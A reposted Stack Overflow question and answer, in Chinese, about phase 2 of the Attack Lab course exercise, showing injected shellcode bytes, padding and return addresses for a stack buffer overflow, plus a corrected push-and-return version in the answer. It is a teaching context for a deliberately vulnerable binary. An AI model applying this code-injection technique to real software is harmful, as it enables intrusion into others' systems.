gpt4 book ai didi

assembly - 缓冲区溢出攻击(攻击实验室第 2 阶段)

转载 作者:行者123 更新时间:2023-12-04 13:02:18 25 4
gpt4 key购买 nike

我有一个缓冲区溢出实验室,我必须为一个名为 The Attack Lab 的项目做实验。 .我正处于实验室的第 2 阶段,我必须将代码作为漏洞利用字符串的一部分注入(inject),以使程序指向函数 touch2() 的地址。我已经到了输出说它是阶段 2 的有效解决方案的地步,但随后它说我导致了段错误,然后说我在该阶段失败了。

这是我收到的错误消息

cookie:  0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED

这是我在汇编中的漏洞利用代码
mov1 $0x2d6fc2d5, %rdi
retq

这就是我传递给程序的内容
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()

我已经在网上查看了教程并且已经研究了几个小时,但我还没有找到解决方案,我不确定是什么导致了这个问题。它说解决方案是有效的,但随后出现段错误并失败。任何帮助将不胜感激,如果有任何需要澄清的地方,请告诉我!

最佳答案

攻击实验室最近似乎有所调整。
您应该避免覆盖堆栈中返回地址的下一部分

相反,您可以使用 push 指令将值添加到堆栈中。
尝试从输入中删除 touch2 地址并使用以下代码。

mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret

关于assembly - 缓冲区溢出攻击(攻击实验室第 2 阶段),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/53255874/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com